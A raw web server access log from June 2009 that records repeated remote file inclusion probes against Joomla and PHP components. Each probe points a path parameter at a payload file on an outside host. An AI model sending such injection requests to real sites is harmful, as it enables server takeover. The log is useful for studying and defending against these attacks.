84.201.208.50 - - [12/Jun/2009:19:30:21 -0700] "GET /logs/access_070912.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
83.16.182.130 - - [12/Jun/2009:19:31:58 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
83.16.182.130 - - [12/Jun/2009:19:31:58 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
83.16.182.130 - - [12/Jun/2009:19:31:58 -0700] "GET /logs/access_070812.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
83.16.182.130 - - [12/Jun/2009:19:32:17 -0700] "GET /logs/access_070912.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:19:32:20 -0700] "GET /logs/access_070612.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:33:27 -0700] "GET /logs/access_070912.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:33:40 -0700] "GET /logs/access_070812.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:19:34:10 -0700] "GET /logs/access_071212.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:19:34:54 -0700] "GET /logs/access_070912.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:19:34:54 -0700] "GET /logs/access_070812.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:19:35:20 -0700] "GET /logs/access_070612.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:19:40:14 -0700] "GET /logs/access_070912.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:19:40:14 -0700] "GET /logs/access_070812.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
72.30.142.125 - - [12/Jun/2009:19:45:14 -0700] "GET /logs/access_081212.log HTTP/1.0" 200 131072 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "projectpr.com"
218.208.21.7 - - [12/Jun/2009:19:48:02 -0700] "GET /logs/access_071012.log//components/errors.php?error=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.208.21.7 - - [12/Jun/2009:19:48:03 -0700] "GET /logs//components/errors.php?error=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.208.21.7 - - [12/Jun/2009:19:48:03 -0700] "GET /components/errors.php?error=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.208.21.7 - - [12/Jun/2009:19:48:03 -0700] "GET /logs/access_070812.log//components/errors.php?error=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:19:48:20 -0700] "GET /clipart/images/?N=D HTTP/1.0" 200 806 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:19:49:04 -0700] "GET /logs/access_070812.log//components/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:19:49:04 -0700] "GET /components/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:19:49:04 -0700] "GET /logs//components/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:19:49:06 -0700] "GET /logs/access_070812.log//components/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:19:49:06 -0700] "GET /components/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:19:49:06 -0700] "GET /logs//components/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:19:49:19 -0700] "GET /logs/access_071012.log//components/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:19:49:20 -0700] "GET /logs/access_071012.log//components/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:19:59:48 -0700] "GET /logs/access_070812.log//components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:19:59:48 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:19:59:48 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:19:59:50 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:19:59:50 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:19:59:50 -0700] "GET /logs/access_070812.log//components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:19:59:54 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:19:59:54 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:19:59:55 -0700] "GET /logs/access_070812.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:19:59:55 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:19:59:55 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:19:59:55 -0700] "GET /logs/access_070812.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:20:01:24 -0700] "GET /clipart/backgrounds/ HTTP/1.0" 200 680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:04:20 -0700] "GET /logs/access_070612.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:04:20 -0700] "GET /logs/access_070612.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:20:05:12 -0700] "GET /components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:20:05:12 -0700] "GET /logs//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:20:05:12 -0700] "GET /logs/access_070812.log//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:20:05:16 -0700] "GET /logs/access_071012.log//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:20:05:25 -0700] "GET /components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:20:05:25 -0700] "GET /logs/access_070812.log//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:20:05:25 -0700] "GET /logs//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:20:05:28 -0700] "GET /logs/access_070912.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:20:05:28 -0700] "GET /logs/access_070812.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:20:05:30 -0700] "GET /logs/access_071012.log//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:20:05:34 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:05:34 -0700] "GET /logs/access_071212.log//components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:20:05:37 -0700] "GET /logs//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:20:05:37 -0700] "GET /components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:20:05:38 -0700] "GET /logs/access_070812.log//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:20:05:42 -0700] "GET /logs/access_071012.log//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:05:43 -0700] "GET /logs/access_071212.log//components/com_smf/smf.php?mosConfig_absolute_path=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:20:06:24 -0700] "GET /logs//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:20:06:24 -0700] "GET /logs/access_070812.log//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:20:06:28 -0700] "GET /logs/access_071012.log//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
83.16.182.130 - - [12/Jun/2009:20:06:46 -0700] "GET /components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
83.16.182.130 - - [12/Jun/2009:20:06:46 -0700] "GET /logs//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
83.16.182.130 - - [12/Jun/2009:20:06:51 -0700] "GET /logs/access_071012.log//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:07:31 -0700] "GET /logs/access_071012.log//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:07:31 -0700] "GET /include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:07:32 -0700] "GET /include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:07:32 -0700] "GET /logs//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:07:32 -0700] "GET /logs//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:07:32 -0700] "GET /logs/access_071012.log//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:07:39 -0700] "GET /include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:07:39 -0700] "GET /logs//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:07:39 -0700] "GET /include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:07:39 -0700] "GET /logs/access_071012.log%20%20//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:07:40 -0700] "GET /logs//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:07:40 -0700] "GET /logs/access_071012.log%20%20//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:20:08:09 -0700] "GET /logs/access_070812.log%20%20//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:20:08:09 -0700] "GET /logs/access_071012.log%20%20//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:20:08:56 -0700] "GET /logs/access_070812.log%20%20//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:20:09:00 -0700] "GET /logs/access_071012.log%20%20//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:09:31 -0700] "GET /include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:09:31 -0700] "GET /logs//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:09:31 -0700] "GET /logs/access_071012.log//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:09:31 -0700] "GET /logs/access_071012.log//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:09:31 -0700] "GET /include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:09:31 -0700] "GET /logs//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:09:36 -0700] "GET /logs/access_070912.log%20%20//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:09:39 -0700] "GET /logs/access_070912.log%20%20//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:10:58 -0700] "GET /logs/access_070912.log//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.94.80.27 - - [12/Jun/2009:20:11:06 -0700] "GET /logs/access_070912.log//include.php?path[docroot]=http://kamama.thin-media.ca/cyzwy/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
211.239.150.144 - - [12/Jun/2009:20:11:13 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
211.239.150.144 - - [12/Jun/2009:20:11:13 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
211.239.150.144 - - [12/Jun/2009:20:11:13 -0700] "GET /logs/access_070912.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:20:11:21 -0700] "GET /logs/access_070812.log%20%20//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:20:11:21 -0700] "GET /logs/access_071012.log%20%20//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
211.239.150.144 - - [12/Jun/2009:20:11:38 -0700] "GET /logs/access_071012.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:20:15:09 -0700] "GET /logs/access_070812.log%20%20//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:20:15:09 -0700] "GET /logs/access_071012.log%20%20//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
211.239.150.144 - - [12/Jun/2009:20:17:44 -0700] "GET /logs/access_070912.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
211.239.150.144 - - [12/Jun/2009:20:17:55 -0700] "GET /logs/access_071012.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
83.16.182.130 - - [12/Jun/2009:20:18:35 -0700] "GET /logs/access_070812.log%20%20//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
83.16.182.130 - - [12/Jun/2009:20:18:36 -0700] "GET /logs/access_071012.log%20%20//components/errors.php?error=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
83.16.182.130 - - [12/Jun/2009:20:20:39 -0700] "GET /logs/access_070912.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.85.165.10 - - [12/Jun/2009:20:37:21 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.85.165.10 - - [12/Jun/2009:20:37:21 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.85.165.10 - - [12/Jun/2009:20:37:22 -0700] "GET /logs/access.log%20%20/joomla/index.php?option=com_restaurante&task=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:20:37:42 -0700] "GET /clipart/?M=A HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:21:07:44 -0700] "GET /logs/access_070912.log//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:21:07:44 -0700] "GET /errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:21:07:45 -0700] "GET /logs//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:21:10:25 -0700] "GET /logs/access_071012.log//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:21:16:07 -0700] "GET /logs/access_071112.log//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
